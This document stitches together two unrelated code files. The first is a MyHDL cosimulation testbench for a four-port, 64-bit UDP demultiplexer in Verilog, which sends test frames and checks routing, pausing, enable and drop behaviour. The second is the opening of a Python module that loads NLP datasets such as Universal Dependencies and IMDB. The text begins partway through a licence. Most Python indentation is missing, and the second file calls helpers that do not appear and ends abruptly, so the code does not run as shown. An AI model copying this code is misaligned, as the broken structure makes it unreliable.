to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from myhdl import *
import os
import udp_ep
module = 'udp_demux'
testbench = 'test_%s_64_4' % module
srcs = []
srcs.append("../rtl/%s.v" % module)
srcs.append("%s.v" % testbench)
src = ' '.join(srcs)
build_cmd = "iverilog -o %s.vvp %s" % (testbench, src)
def bench():
# Parameters
M_COUNT = 4
DATA_WIDTH = 64
KEEP_ENABLE = (DATA_WIDTH>8)
    KEEP_WIDTH = (DATA_WIDTH // 8)
ID_ENABLE = 1
ID_WIDTH = 8
DEST_ENABLE = 1
DEST_WIDTH = 8
USER_ENABLE = 1
USER_WIDTH = 1
# Inputs
clk = Signal(bool(0))
rst = Signal(bool(0))
current_test = Signal(intbv(0)[8:])
s_udp_hdr_valid = Signal(bool(0))
s_eth_dest_mac = Signal(intbv(0)[48:])
s_eth_src_mac = Signal(intbv(0)[48:])
s_eth_type = Signal(intbv(0)[16:])
s_ip_version = Signal(intbv(0)[4:])
s_ip_ihl = Signal(intbv(0)[4:])
s_ip_dscp = Signal(intbv(0)[6:])
s_ip_ecn = Signal(intbv(0)[2:])
s_ip_length = Signal(intbv(0)[16:])
s_ip_identification = Signal(intbv(0)[16:])
s_ip_flags = Signal(intbv(0)[3:])
s_ip_fragment_offset = Signal(intbv(0)[13:])
s_ip_ttl = Signal(intbv(0)[8:])
s_ip_protocol = Signal(intbv(0)[8:])
s_ip_header_checksum = Signal(intbv(0)[16:])
s_ip_source_ip = Signal(intbv(0)[32:])
s_ip_dest_ip = Signal(intbv(0)[32:])
s_udp_source_port = Signal(intbv(0)[16:])
s_udp_dest_port = Signal(intbv(0)[16:])
s_udp_length = Signal(intbv(0)[16:])
s_udp_checksum = Signal(intbv(0)[16:])
s_udp_payload_axis_tdata = Signal(intbv(0)[DATA_WIDTH:])
s_udp_payload_axis_tkeep = Signal(intbv(1)[KEEP_WIDTH:])
s_udp_payload_axis_tvalid = Signal(bool(0))
s_udp_payload_axis_tlast = Signal(bool(0))
s_udp_payload_axis_tid = Signal(intbv(0)[ID_WIDTH:])
s_udp_payload_axis_tdest = Signal(intbv(0)[DEST_WIDTH:])
s_udp_payload_axis_tuser = Signal(intbv(0)[USER_WIDTH:])
m_udp_hdr_ready_list = [Signal(bool(0)) for i in range(M_COUNT)]
m_udp_payload_axis_tready_list = [Signal(bool(0)) for i in range(M_COUNT)]
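    # ConcatSignal puts its first argument in the most significant position,
    # so the lists are reversed to keep port 0 in the least significant bit.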
m_udp_hdr_ready = ConcatSignal(*reversed(m_udp_hdr_ready_list))
m_udp_payload_axis_tready = ConcatSignal(*reversed(m_udp_payload_axis_tready_list))
enable = Signal(bool(0))
drop = Signal(bool(0))
select = Signal(intbv(0)[2:])
# Outputs
s_udp_hdr_ready = Signal(bool(0))
s_udp_payload_axis_tready = Signal(bool(0))
m_udp_hdr_valid = Signal(intbv(0)[M_COUNT:])
m_eth_dest_mac = Signal(intbv(0)[M_COUNT*48:])
m_eth_src_mac = Signal(intbv(0)[M_COUNT*48:])
m_eth_type = Signal(intbv(0)[M_COUNT*16:])
m_ip_version = Signal(intbv(0)[M_COUNT*4:])
m_ip_ihl = Signal(intbv(0)[M_COUNT*4:])
m_ip_dscp = Signal(intbv(0)[M_COUNT*6:])
m_ip_ecn = Signal(intbv(0)[M_COUNT*2:])
m_ip_length = Signal(intbv(0)[M_COUNT*16:])
m_ip_identification = Signal(intbv(0)[M_COUNT*16:])
m_ip_flags = Signal(intbv(0)[M_COUNT*3:])
m_ip_fragment_offset = Signal(intbv(0)[M_COUNT*13:])
m_ip_ttl = Signal(intbv(0)[M_COUNT*8:])
m_ip_protocol = Signal(intbv(0)[M_COUNT*8:])
m_ip_header_checksum = Signal(intbv(0)[M_COUNT*16:])
m_ip_source_ip = Signal(intbv(0)[M_COUNT*32:])
m_ip_dest_ip = Signal(intbv(0)[M_COUNT*32:])
m_udp_source_port = Signal(intbv(0)[M_COUNT*16:])
m_udp_dest_port = Signal(intbv(0)[M_COUNT*16:])
m_udp_length = Signal(intbv(0)[M_COUNT*16:])
m_udp_checksum = Signal(intbv(0)[M_COUNT*16:])
m_udp_payload_axis_tdata = Signal(intbv(0)[M_COUNT*DATA_WIDTH:])
m_udp_payload_axis_tkeep = Signal(intbv(0xf)[M_COUNT*KEEP_WIDTH:])
m_udp_payload_axis_tvalid = Signal(intbv(0)[M_COUNT:])
m_udp_payload_axis_tlast = Signal(intbv(0)[M_COUNT:])
m_udp_payload_axis_tid = Signal(intbv(0)[M_COUNT*ID_WIDTH:])
m_udp_payload_axis_tdest = Signal(intbv(0)[M_COUNT*DEST_WIDTH:])
m_udp_payload_axis_tuser = Signal(intbv(0)[M_COUNT*USER_WIDTH:])
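    # Per-port shadow signals sliced out of the packed DUT output buses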
m_udp_hdr_valid_list = [m_udp_hdr_valid(i) for i in range(M_COUNT)]
m_eth_dest_mac_list = [m_eth_dest_mac((i+1)*48, i*48) for i in range(M_COUNT)]
m_eth_src_mac_list = [m_eth_src_mac((i+1)*48, i*48) for i in range(M_COUNT)]
m_eth_type_list = [m_eth_type((i+1)*16, i*16) for i in range(M_COUNT)]
m_ip_version_list = [m_ip_version((i+1)*4, i*4) for i in range(M_COUNT)]
m_ip_ihl_list = [m_ip_ihl((i+1)*4, i*4) for i in range(M_COUNT)]
m_ip_dscp_list = [m_ip_dscp((i+1)*6, i*6) for i in range(M_COUNT)]
m_ip_ecn_list = [m_ip_ecn((i+1)*2, i*2) for i in range(M_COUNT)]
m_ip_length_list = [m_ip_length((i+1)*16, i*16) for i in range(M_COUNT)]
m_ip_identification_list = [m_ip_identification((i+1)*16, i*16) for i in range(M_COUNT)]
m_ip_flags_list = [m_ip_flags((i+1)*3, i*3) for i in range(M_COUNT)]
m_ip_fragment_offset_list = [m_ip_fragment_offset((i+1)*13, i*13) for i in range(M_COUNT)]
m_ip_ttl_list = [m_ip_ttl((i+1)*8, i*8) for i in range(M_COUNT)]
m_ip_protocol_list = [m_ip_protocol((i+1)*8, i*8) for i in range(M_COUNT)]
m_ip_header_checksum_list = [m_ip_header_checksum((i+1)*16, i*16) for i in range(M_COUNT)]
m_ip_source_ip_list = [m_ip_source_ip((i+1)*32, i*32) for i in range(M_COUNT)]
m_ip_dest_ip_list = [m_ip_dest_ip((i+1)*32, i*32) for i in range(M_COUNT)]
m_udp_source_port_list = [m_udp_source_port((i+1)*16, i*16) for i in range(M_COUNT)]
m_udp_dest_port_list = [m_udp_dest_port((i+1)*16, i*16) for i in range(M_COUNT)]
m_udp_length_list = [m_udp_length((i+1)*16, i*16) for i in range(M_COUNT)]
m_udp_checksum_list = [m_udp_checksum((i+1)*16, i*16) for i in range(M_COUNT)]
m_udp_payload_axis_tdata_list = [m_udp_payload_axis_tdata((i+1)*DATA_WIDTH, i*DATA_WIDTH) for i in range(M_COUNT)]
m_udp_payload_axis_tkeep_list = [m_udp_payload_axis_tkeep((i+1)*KEEP_WIDTH, i*KEEP_WIDTH) for i in range(M_COUNT)]
m_udp_payload_axis_tvalid_list = [m_udp_payload_axis_tvalid(i) for i in range(M_COUNT)]
m_udp_payload_axis_tlast_list = [m_udp_payload_axis_tlast(i) for i in range(M_COUNT)]
m_udp_payload_axis_tid_list = [m_udp_payload_axis_tid((i+1)*ID_WIDTH, i*ID_WIDTH) for i in range(M_COUNT)]
m_udp_payload_axis_tdest_list = [m_udp_payload_axis_tdest((i+1)*DEST_WIDTH, i*DEST_WIDTH) for i in range(M_COUNT)]
m_udp_payload_axis_tuser_list = [m_udp_payload_axis_tuser((i+1)*USER_WIDTH, i*USER_WIDTH) for i in range(M_COUNT)]
# sources and sinks
source_pause = Signal(bool(0))
sink_pause_list = []
sink_list = []
sink_logic_list = []
source = udp_ep.UDPFrameSource()
source_logic = source.create_logic(
clk,
rst,
udp_hdr_ready=s_udp_hdr_ready,
udp_hdr_valid=s_udp_hdr_valid,
eth_dest_mac=s_eth_dest_mac,
eth_src_mac=s_eth_src_mac,
eth_type=s_eth_type,
ip_version=s_ip_version,
ip_ihl=s_ip_ihl,
ip_dscp=s_ip_dscp,
ip_ecn=s_ip_ecn,
ip_length=s_ip_length,
ip_identification=s_ip_identification,
ip_flags=s_ip_flags,
ip_fragment_offset=s_ip_fragment_offset,
ip_ttl=s_ip_ttl,
ip_protocol=s_ip_protocol,
ip_header_checksum=s_ip_header_checksum,
ip_source_ip=s_ip_source_ip,
ip_dest_ip=s_ip_dest_ip,
udp_source_port=s_udp_source_port,
udp_dest_port=s_udp_dest_port,
udp_length=s_udp_length,
udp_checksum=s_udp_checksum,
udp_payload_tdata=s_udp_payload_axis_tdata,
udp_payload_tkeep=s_udp_payload_axis_tkeep,
udp_payload_tvalid=s_udp_payload_axis_tvalid,
udp_payload_tready=s_udp_payload_axis_tready,
udp_payload_tlast=s_udp_payload_axis_tlast,
udp_payload_tuser=s_udp_payload_axis_tuser,
pause=source_pause,
name='source'
)
for k in range(M_COUNT):
s = udp_ep.UDPFrameSink()
p = Signal(bool(0))
sink_list.append(s)
sink_pause_list.append(p)
sink_logic_list.append(s.create_logic(
clk,
rst,
udp_hdr_ready=m_udp_hdr_ready_list[k],
udp_hdr_valid=m_udp_hdr_valid_list[k],
eth_dest_mac=m_eth_dest_mac_list[k],
eth_src_mac=m_eth_src_mac_list[k],
eth_type=m_eth_type_list[k],
ip_version=m_ip_version_list[k],
ip_ihl=m_ip_ihl_list[k],
ip_dscp=m_ip_dscp_list[k],
ip_ecn=m_ip_ecn_list[k],
ip_length=m_ip_length_list[k],
ip_identification=m_ip_identification_list[k],
ip_flags=m_ip_flags_list[k],
ip_fragment_offset=m_ip_fragment_offset_list[k],
ip_ttl=m_ip_ttl_list[k],
ip_protocol=m_ip_protocol_list[k],
ip_header_checksum=m_ip_header_checksum_list[k],
ip_source_ip=m_ip_source_ip_list[k],
ip_dest_ip=m_ip_dest_ip_list[k],
udp_source_port=m_udp_source_port_list[k],
udp_dest_port=m_udp_dest_port_list[k],
udp_length=m_udp_length_list[k],
udp_checksum=m_udp_checksum_list[k],
udp_payload_tdata=m_udp_payload_axis_tdata_list[k],
udp_payload_tkeep=m_udp_payload_axis_tkeep_list[k],
udp_payload_tvalid=m_udp_payload_axis_tvalid_list[k],
udp_payload_tready=m_udp_payload_axis_tready_list[k],
udp_payload_tlast=m_udp_payload_axis_tlast_list[k],
udp_payload_tuser=m_udp_payload_axis_tuser_list[k],
pause=p,
name='sink_%d' % k
))
# DUT
if os.system(build_cmd):
raise Exception("Error running build command")
dut = Cosimulation(
"vvp -m myhdl %s.vvp -lxt2" % testbench,
clk=clk,
rst=rst,
current_test=current_test,
s_udp_hdr_valid=s_udp_hdr_valid,
s_udp_hdr_ready=s_udp_hdr_ready,
s_eth_dest_mac=s_eth_dest_mac,
s_eth_src_mac=s_eth_src_mac,
s_eth_type=s_eth_type,
s_ip_version=s_ip_version,
s_ip_ihl=s_ip_ihl,
s_ip_dscp=s_ip_dscp,
s_ip_ecn=s_ip_ecn,
s_ip_length=s_ip_length,
s_ip_identification=s_ip_identification,
s_ip_flags=s_ip_flags,
s_ip_fragment_offset=s_ip_fragment_offset,
s_ip_ttl=s_ip_ttl,
s_ip_protocol=s_ip_protocol,
s_ip_header_checksum=s_ip_header_checksum,
s_ip_source_ip=s_ip_source_ip,
s_ip_dest_ip=s_ip_dest_ip,
s_udp_source_port=s_udp_source_port,
s_udp_dest_port=s_udp_dest_port,
s_udp_length=s_udp_length,
s_udp_checksum=s_udp_checksum,
s_udp_payload_axis_tdata=s_udp_payload_axis_tdata,
s_udp_payload_axis_tkeep=s_udp_payload_axis_tkeep,
s_udp_payload_axis_tvalid=s_udp_payload_axis_tvalid,
s_udp_payload_axis_tready=s_udp_payload_axis_tready,
s_udp_payload_axis_tlast=s_udp_payload_axis_tlast,
s_udp_payload_axis_tid=s_udp_payload_axis_tid,
s_udp_payload_axis_tdest=s_udp_payload_axis_tdest,
s_udp_payload_axis_tuser=s_udp_payload_axis_tuser,
m_udp_hdr_valid=m_udp_hdr_valid,
m_udp_hdr_ready=m_udp_hdr_ready,
m_eth_dest_mac=m_eth_dest_mac,
m_eth_src_mac=m_eth_src_mac,
m_eth_type=m_eth_type,
m_ip_version=m_ip_version,
m_ip_ihl=m_ip_ihl,
m_ip_dscp=m_ip_dscp,
m_ip_ecn=m_ip_ecn,
m_ip_length=m_ip_length,
m_ip_identification=m_ip_identification,
m_ip_flags=m_ip_flags,
m_ip_fragment_offset=m_ip_fragment_offset,
m_ip_ttl=m_ip_ttl,
m_ip_protocol=m_ip_protocol,
m_ip_header_checksum=m_ip_header_checksum,
m_ip_source_ip=m_ip_source_ip,
m_ip_dest_ip=m_ip_dest_ip,
m_udp_source_port=m_udp_source_port,
m_udp_dest_port=m_udp_dest_port,
m_udp_length=m_udp_length,
m_udp_checksum=m_udp_checksum,
m_udp_payload_axis_tdata=m_udp_payload_axis_tdata,
m_udp_payload_axis_tkeep=m_udp_payload_axis_tkeep,
m_udp_payload_axis_tvalid=m_udp_payload_axis_tvalid,
m_udp_payload_axis_tready=m_udp_payload_axis_tready,
m_udp_payload_axis_tlast=m_udp_payload_axis_tlast,
m_udp_payload_axis_tid=m_udp_payload_axis_tid,
m_udp_payload_axis_tdest=m_udp_payload_axis_tdest,
m_udp_payload_axis_tuser=m_udp_payload_axis_tuser,
enable=enable,
drop=drop,
select=select
)
@always(delay(4))
def clkgen():
clk.next = not clk
@instance
def check():
yield delay(100)
yield clk.posedge
rst.next = 1
yield clk.posedge
rst.next = 0
yield clk.posedge
yield delay(100)
yield clk.posedge
yield clk.posedge
enable.next = True
yield clk.posedge
print("test 1: select port 0")
current_test.next = 1
select.next = 0
test_frame = udp_ep.UDPFrame()
test_frame.eth_dest_mac = 0xDAD1D2D3D4D5
test_frame.eth_src_mac = 0x5A5152535455
test_frame.eth_type = 0x8000
test_frame.ip_version = 4
test_frame.ip_ihl = 5
test_frame.ip_dscp = 0
test_frame.ip_ecn = 0
test_frame.ip_length = None
test_frame.ip_identification = 0
test_frame.ip_flags = 2
test_frame.ip_fragment_offset = 0
test_frame.ip_ttl = 64
test_frame.ip_protocol = 0x11
test_frame.ip_header_checksum = None
test_frame.ip_source_ip = 0xc0a80165
test_frame.ip_dest_ip = 0xc0a80164
test_frame.udp_source_port = 1
test_frame.udp_dest_port = 2
test_frame.udp_length = None
test_frame.udp_checksum = None
test_frame.payload = bytearray(range(32))
test_frame.build()
source.send(test_frame)
yield sink_list[0].wait()
rx_frame = sink_list[0].recv()
assert rx_frame == test_frame
yield delay(100)
yield clk.posedge
print("test 2: select port 1")
current_test.next = 2
select.next = 1
test_frame = udp_ep.UDPFrame()
test_frame.eth_dest_mac = 0xDAD1D2D3D4D5
test_frame.eth_src_mac = 0x5A5152535455
test_frame.eth_type = 0x8000
test_frame.ip_version = 4
test_frame.ip_ihl = 5
test_frame.ip_dscp = 0
test_frame.ip_ecn = 0
test_frame.ip_length = None
test_frame.ip_identification = 0
test_frame.ip_flags = 2
test_frame.ip_fragment_offset = 0
test_frame.ip_ttl = 64
test_frame.ip_protocol = 0x11
test_frame.ip_header_checksum = None
test_frame.ip_source_ip = 0xc0a80165
test_frame.ip_dest_ip = 0xc0a80164
test_frame.udp_source_port = 1
test_frame.udp_dest_port = 2
test_frame.udp_length = None
test_frame.udp_checksum = None
test_frame.payload = bytearray(range(32))
test_frame.build()
source.send(test_frame)
yield sink_list[1].wait()
rx_frame = sink_list[1].recv()
assert rx_frame == test_frame
yield delay(100)
yield clk.posedge
print("test 3: back-to-back packets, same port")
current_test.next = 3
select.next = 0
test_frame1 = udp_ep.UDPFrame()
test_frame1.eth_dest_mac = 0xDAD1D2D3D4D5
test_frame1.eth_src_mac = 0x5A5152535455
test_frame1.eth_type = 0x8000
test_frame1.ip_version = 4
test_frame1.ip_ihl = 5
test_frame1.ip_dscp = 0
test_frame1.ip_ecn = 0
test_frame1.ip_length = None
test_frame1.ip_identification = 0
test_frame1.ip_flags = 2
test_frame1.ip_fragment_offset = 0
test_frame1.ip_ttl = 64
test_frame1.ip_protocol = 0x11
test_frame1.ip_header_checksum = None
test_frame1.ip_source_ip = 0xc0a80165
test_frame1.ip_dest_ip = 0xc0a80164
test_frame1.udp_source_port = 1
test_frame1.udp_dest_port = 2
test_frame1.udp_length = None
test_frame1.udp_checksum = None
test_frame1.payload = bytearray(range(32))
test_frame1.build()
test_frame2 = udp_ep.UDPFrame()
test_frame2.eth_dest_mac = 0xDAD1D2D3D4D5
test_frame2.eth_src_mac = 0x5A5152535455
test_frame2.eth_type = 0x8000
test_frame2.ip_version = 4
test_frame2.ip_ihl = 5
test_frame2.ip_dscp = 0
test_frame2.ip_ecn = 0
test_frame2.ip_length = None
test_frame2.ip_identification = 0
test_frame2.ip_flags = 2
test_frame2.ip_fragment_offset = 0
test_frame2.ip_ttl = 64
test_frame2.ip_protocol = 0x11
test_frame2.ip_header_checksum = None
test_frame2.ip_source_ip = 0xc0a80165
test_frame2.ip_dest_ip = 0xc0a80164
test_frame2.udp_source_port = 1
test_frame2.udp_dest_port = 2
test_frame2.udp_length = None
test_frame2.udp_checksum = None
test_frame2.payload = bytearray(range(32))
test_frame2.build()
source.send(test_frame1)
source.send(test_frame2)
yield sink_list[0].wait()
rx_frame = sink_list[0].recv()
assert rx_frame == test_frame1
yield sink_list[0].wait()
rx_frame = sink_list[0].recv()
assert rx_frame == test_frame2
yield delay(100)
yield clk.posedge
print("test 4: back-to-back packets, different ports")
current_test.next = 4
select.next = 1
test_frame1 = udp_ep.UDPFrame()
test_frame1.eth_dest_mac = 0xDAD1D2D3D4D5
test_frame1.eth_src_mac = 0x5A5152535455
test_frame1.eth_type = 0x8000
test_frame1.ip_version = 4
test_frame1.ip_ihl = 5
test_frame1.ip_dscp = 0
test_frame1.ip_ecn = 0
test_frame1.ip_length = None
test_frame1.ip_identification = 0
test_frame1.ip_flags = 2
test_frame1.ip_fragment_offset = 0
test_frame1.ip_ttl = 64
test_frame1.ip_protocol = 0x11
test_frame1.ip_header_checksum = None
test_frame1.ip_source_ip = 0xc0a80165
test_frame1.ip_dest_ip = 0xc0a80164
test_frame1.udp_source_port = 1
test_frame1.udp_dest_port = 2
test_frame1.udp_length = None
test_frame1.udp_checksum = None
test_frame1.payload = bytearray(range(32))
test_frame1.build()
test_frame2 = udp_ep.UDPFrame()
test_frame2.eth_dest_mac = 0xDAD1D2D3D4D5
test_frame2.eth_src_mac = 0x5A5152535455
test_frame2.eth_type = 0x8000
test_frame2.ip_version = 4
test_frame2.ip_ihl = 5
test_frame2.ip_dscp = 0
test_frame2.ip_ecn = 0
test_frame2.ip_length = None
test_frame2.ip_identification = 0
test_frame2.ip_flags = 2
test_frame2.ip_fragment_offset = 0
test_frame2.ip_ttl = 64
test_frame2.ip_protocol = 0x11
test_frame2.ip_header_checksum = None
test_frame2.ip_source_ip = 0xc0a80165
test_frame2.ip_dest_ip = 0xc0a80164
test_frame2.udp_source_port = 1
test_frame2.udp_dest_port = 2
test_frame2.udp_length = None
test_frame2.udp_checksum = None
test_frame2.payload = bytearray(range(32))
test_frame2.build()
source.send(test_frame1)
source.send(test_frame2)
yield clk.posedge
while s_udp_payload_axis_tvalid or s_udp_hdr_valid:
yield clk.posedge
select.next = 2
yield sink_list[1].wait()
rx_frame = sink_list[1].recv()
assert rx_frame == test_frame1
yield sink_list[2].wait()
rx_frame = sink_list[2].recv()
assert rx_frame == test_frame2
yield delay(100)
yield clk.posedge
print("test 5: alterate pause source")
current_test.next = 5
select.next = 1
test_frame1 = udp_ep.UDPFrame()
test_frame1.eth_dest_mac = 0xDAD1D2D3D4D5
test_frame1.eth_src_mac = 0x5A5152535455
test_frame1.eth_type = 0x8000
test_frame1.ip_version = 4
test_frame1.ip_ihl = 5
test_frame1.ip_dscp = 0
test_frame1.ip_ecn = 0
test_frame1.ip_length = None
test_frame1.ip_identification = 0
test_frame1.ip_flags = 2
test_frame1.ip_fragment_offset = 0
test_frame1.ip_ttl = 64
test_frame1.ip_protocol = 0x11
test_frame1.ip_header_checksum = None
test_frame1.ip_source_ip = 0xc0a80165
test_frame1.ip_dest_ip = 0xc0a80164
test_frame1.udp_source_port = 1
test_frame1.udp_dest_port = 2
test_frame1.udp_length = None
test_frame1.udp_checksum = None
test_frame1.payload = bytearray(range(32))
test_frame1.build()
test_frame2 = udp_ep.UDPFrame()
test_frame2.eth_dest_mac = 0xDAD1D2D3D4D5
test_frame2.eth_src_mac = 0x5A5152535455
test_frame2.eth_type = 0x8000
test_frame2.ip_version = 4
test_frame2.ip_ihl = 5
test_frame2.ip_dscp = 0
test_frame2.ip_ecn = 0
test_frame2.ip_length = None
test_frame2.ip_identification = 0
test_frame2.ip_flags = 2
test_frame2.ip_fragment_offset = 0
test_frame2.ip_ttl = 64
test_frame2.ip_protocol = 0x11
test_frame2.ip_header_checksum = None
test_frame2.ip_source_ip = 0xc0a80165
test_frame2.ip_dest_ip = 0xc0a80164
test_frame2.udp_source_port = 1
test_frame2.udp_dest_port = 2
test_frame2.udp_length = None
test_frame2.udp_checksum = None
test_frame2.payload = bytearray(range(32))
test_frame2.build()
source.send(test_frame1)
source.send(test_frame2)
yield clk.posedge
while s_udp_payload_axis_tvalid or s_udp_hdr_valid:
source_pause.next = True
yield clk.posedge
yield clk.posedge
yield clk.posedge
source_pause.next = False
yield clk.posedge
select.next = 2
yield sink_list[1].wait()
rx_frame = sink_list[1].recv()
assert rx_frame == test_frame1
yield sink_list[2].wait()
rx_frame = sink_list[2].recv()
assert rx_frame == test_frame2
yield delay(100)
yield clk.posedge
print("test 6: alterate pause sink")
current_test.next = 6
select.next = 1
test_frame1 = udp_ep.UDPFrame()
test_frame1.eth_dest_mac = 0xDAD1D2D3D4D5
test_frame1.eth_src_mac = 0x5A5152535455
test_frame1.eth_type = 0x8000
test_frame1.ip_version = 4
test_frame1.ip_ihl = 5
test_frame1.ip_dscp = 0
test_frame1.ip_ecn = 0
test_frame1.ip_length = None
test_frame1.ip_identification = 0
test_frame1.ip_flags = 2
test_frame1.ip_fragment_offset = 0
test_frame1.ip_ttl = 64
test_frame1.ip_protocol = 0x11
test_frame1.ip_header_checksum = None
test_frame1.ip_source_ip = 0xc0a80165
test_frame1.ip_dest_ip = 0xc0a80164
test_frame1.udp_source_port = 1
test_frame1.udp_dest_port = 2
test_frame1.udp_length = None
test_frame1.udp_checksum = None
test_frame1.payload = bytearray(range(32))
test_frame1.build()
test_frame2 = udp_ep.UDPFrame()
test_frame2.eth_dest_mac = 0xDAD1D2D3D4D5
test_frame2.eth_src_mac = 0x5A5152535455
test_frame2.eth_type = 0x8000
test_frame2.ip_version = 4
test_frame2.ip_ihl = 5
test_frame2.ip_dscp = 0
test_frame2.ip_ecn = 0
test_frame2.ip_length = None
test_frame2.ip_identification = 0
test_frame2.ip_flags = 2
test_frame2.ip_fragment_offset = 0
test_frame2.ip_ttl = 64
test_frame2.ip_protocol = 0x11
test_frame2.ip_header_checksum = None
test_frame2.ip_source_ip = 0xc0a80165
test_frame2.ip_dest_ip = 0xc0a80164
test_frame2.udp_source_port = 1
test_frame2.udp_dest_port = 2
test_frame2.udp_length = None
test_frame2.udp_checksum = None
test_frame2.payload = bytearray(range(32))
test_frame2.build()
source.send(test_frame1)
source.send(test_frame2)
yield clk.posedge
while s_udp_payload_axis_tvalid or s_udp_hdr_valid:
for k in range(M_COUNT):
                sink_pause_list[k].next = True
yield clk.posedge
yield clk.posedge
yield clk.posedge
for k in range(M_COUNT):
sink_pause_list[k].next = False
yield clk.posedge
select.next = 2
yield sink_list[1].wait()
rx_frame = sink_list[1].recv()
assert rx_frame == test_frame1
yield sink_list[2].wait()
rx_frame = sink_list[2].recv()
assert rx_frame == test_frame2
yield delay(100)
yield clk.posedge
print("test 7: enable")
current_test.next = 7
enable.next = False
select.next = 0
test_frame = udp_ep.UDPFrame()
test_frame.eth_dest_mac = 0xDAD1D2D3D4D5
test_frame.eth_src_mac = 0x5A5152535455
test_frame.eth_type = 0x8000
test_frame.ip_version = 4
test_frame.ip_ihl = 5
test_frame.ip_dscp = 0
test_frame.ip_ecn = 0
test_frame.ip_length = None
test_frame.ip_identification = 0
test_frame.ip_flags = 2
test_frame.ip_fragment_offset = 0
test_frame.ip_ttl = 64
test_frame.ip_protocol = 0x11
test_frame.ip_header_checksum = None
test_frame.ip_source_ip = 0xc0a80165
test_frame.ip_dest_ip = 0xc0a80164
test_frame.udp_source_port = 1
test_frame.udp_dest_port = 2
test_frame.udp_length = None
test_frame.udp_checksum = None
test_frame.payload = bytearray(range(32))
test_frame.build()
source.send(test_frame)
yield delay(500)
assert sink_list[0].empty()
enable.next = True
yield sink_list[0].wait()
rx_frame = sink_list[0].recv()
assert rx_frame == test_frame
yield delay(100)
yield clk.posedge
print("test 8: drop")
current_test.next = 8
drop.next = True
select.next = 0
test_frame = udp_ep.UDPFrame()
test_frame.eth_dest_mac = 0xDAD1D2D3D4D5
test_frame.eth_src_mac = 0x5A5152535455
test_frame.eth_type = 0x8000
test_frame.ip_version = 4
test_frame.ip_ihl = 5
test_frame.ip_dscp = 0
test_frame.ip_ecn = 0
test_frame.ip_length = None
test_frame.ip_identification = 0
test_frame.ip_flags = 2
test_frame.ip_fragment_offset = 0
test_frame.ip_ttl = 64
test_frame.ip_protocol = 0x11
test_frame.ip_header_checksum = None
test_frame.ip_source_ip = 0xc0a80165
test_frame.ip_dest_ip = 0xc0a80164
test_frame.udp_source_port = 1
test_frame.udp_dest_port = 2
test_frame.udp_length = None
test_frame.udp_checksum = None
test_frame.payload = bytearray(range(32))
test_frame.build()
source.send(test_frame)
yield delay(500)
assert sink_list[0].empty()
drop.next = False
yield delay(100)
raise StopSimulation
return instances()
def test_bench():
os.chdir(os.path.dirname(os.path.abspath(__file__)))
sim = Simulation(bench())
sim.run()
if __name__ == '__main__':
print("Running test...")
test_bench()
|
|
import random # pragma: no cover
import io # pragma: no cover
from collections import Counter # pragma: no cover
import os.path # pragma: no cover
import csv # pragma: no cover
import numpy
from pathlib import Path
import json
from ._vendorized.keras_data_utils import get_file # pragma: no cover
from ..neural.util import partition
from ..neural.util import to_categorical
try:
basestring
except NameError:
basestring = str
GITHUB = 'https://github.com/UniversalDependencies/' # pragma: no cover
ANCORA_1_4_ZIP = '{github}/{ancora}/archive/r1.4.zip'.format(
github=GITHUB, ancora='UD_Spanish-AnCora') # pragma: no cover
EWTB_1_4_ZIP = '{github}/{ewtb}/archive/r1.4.zip'.format(
github=GITHUB, ewtb='UD_English') # pragma: no cover
SNLI_URL = 'http://nlp.stanford.edu/projects/snli/snli_1.0.zip'
QUORA_QUESTIONS_URL = 'http://qim.ec.quoracdn.net/quora_duplicate_questions.tsv'
IMDB_URL = 'http://ai.stanford.edu/~amaas/data/sentiment/aclImdb_v1.tar.gz'
def ancora_pos_tags(encode_words=False): # pragma: no cover
data_dir = get_file('UD_Spanish-AnCora-r1.4', ANCORA_1_4_ZIP,
unzip=True)
train_loc = os.path.join(data_dir, 'es_ancora-ud-train.conllu')
dev_loc = os.path.join(data_dir, 'es_ancora-ud-dev.conllu')
return ud_pos_tags(train_loc, dev_loc, encode_words=encode_words)
def ewtb_pos_tags(encode_tags=False, encode_words=False): # pragma: no cover
data_dir = get_file('UD_English-r1.4', EWTB_1_4_ZIP, unzip=True)
train_loc = os.path.join(data_dir, 'en-ud-train.conllu')
dev_loc = os.path.join(data_dir, 'en-ud-dev.conllu')
return ud_pos_tags(train_loc, dev_loc,
encode_tags=encode_tags, encode_words=encode_words)
def ud_pos_tags(train_loc, dev_loc, encode_tags=True, encode_words=True): # pragma: no cover
train_sents = list(read_conll(train_loc))
dev_sents = list(read_conll(dev_loc))
tagmap = {}
freqs = Counter()
for words, tags in train_sents:
for tag in tags:
tagmap.setdefault(tag, len(tagmap))
for word in words:
freqs[word] += 1
vocab = {word: i for i, (word, freq) in enumerate(freqs.most_common())
if (freq >= 5)}
def _encode(sents):
X = []
y = []
for words, tags in sents:
if encode_words:
X.append(
numpy.asarray(
[vocab.get(word, len(vocab)) for word in words],
dtype='uint64'))
else:
X.append(words)
if encode_tags:
y.append(numpy.asarray(
[tagmap[tag] for tag in tags],
dtype='int32'))
else:
y.append(tags)
return zip(X, y)
return _encode(train_sents), _encode(dev_sents), len(tagmap)
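# A hedged usage sketch added for illustration (not part of the original module);
# the .conllu paths are supplied by the caller. With the default flags both the
# word and tag sequences come back encoded as integer arrays.
def _example_ud_pos_tags_usage(train_loc, dev_loc):  # pragma: no cover
    train, dev, nr_tag = ud_pos_tags(train_loc, dev_loc)
    for word_ids, tag_ids in train:
        # word ids are uint64 arrays, tag ids are int32 arrays (see _encode above)
        assert len(word_ids) == len(tag_ids)
    return nr_tag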
def imdb(loc=None, limit=0):
if loc is None:
loc = get_file('aclImdb', IMDB_URL, untar=True, unzip=True)
train_loc = Path(loc) / 'train'
test_loc = Path(loc) / 'test'
return read_imdb(train_loc, limit=limit), read_imdb(test_loc, limit=limit)
